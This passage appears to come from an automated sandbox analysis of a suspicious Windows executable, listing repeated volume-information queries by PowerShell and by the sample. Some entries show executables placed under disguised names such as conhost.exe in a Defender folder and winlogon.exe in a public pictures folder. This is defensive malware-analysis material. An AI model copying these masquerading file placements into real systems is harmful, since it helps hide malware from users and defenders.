Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Users\user\Desktop\4si9noTBNw.exe VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Users\user\Desktop\4si9noTBNw.exe VolumeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeQueries volume information: C:\Program Files\Windows Defender\en-GB\conhost.exe VolumeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeQueries volume information: C:\Program Files\Windows Defender\en-GB\conhost.exe VolumeInformation
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeQueries volume information: C:\Recovery\VTixufCejPQZEvXiB.exe VolumeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeQueries volume information: C:\Program Files\Windows Defender\en-GB\conhost.exe VolumeInformation
                            Source: C:\Users\Public\AccountPictures\winlogon.exeQueries volume information: C:\Users\Public\AccountPictures\winlogon.exe VolumeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeQueries volume information: C:\Program Files\Windows Defender\en-GB\conhost.exe VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Users\user\Desktop\4si9noTBNw.exe VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\pala.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\palai.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\palab.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc | VolumeInformation
